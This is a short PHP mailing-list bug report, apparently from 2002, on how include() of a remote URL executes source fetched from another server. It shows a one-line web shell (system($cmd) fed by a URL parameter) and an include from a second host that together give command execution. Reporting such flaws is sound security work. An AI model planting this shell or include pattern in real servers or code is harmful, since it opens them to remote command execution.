From: [EMAIL PROTECTED]
Operating system: Linux 2.4
PHP version: 4.1.1
PHP Bug Type: Scripting Engine problem
Bug description: PHP parses untrusted documents (or something like that ;P)
Hello,
I think there is a pretty large security issue in PHP. E.g. we have 2
servers, we call server 1 'embrace', and name server 2 'kossy'.
on embrace we create a file index.php:
<? include("http://kossy/issue.php";); ?>
on kossy we create a file issue.php:
<? system($cmd); ?>
well, if we now type: http://embrace/index.php?cmd=ls we see the 'ls'
output from kossy. This is the way it should be.. BUT, when we disable PHP
op kossy we get a rather nasty bug (imho).
If we type http://embrace/index.php?cmd=ls again (where kossy has no PHP
support) embrace includes the PHP source code from kossy and then parses
the file, which will give us the 'ls' result on embrace.
This can be used for numerous attacks. And I PHP should only include
parsed PHP or non-PHP files from external (http://) links.
Bye,
Tozz
--
Edit bug report at: http://bugs.php.net/?id=15187&edit=1
--
PHP Development Mailing List <http://www.php.net/>
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]
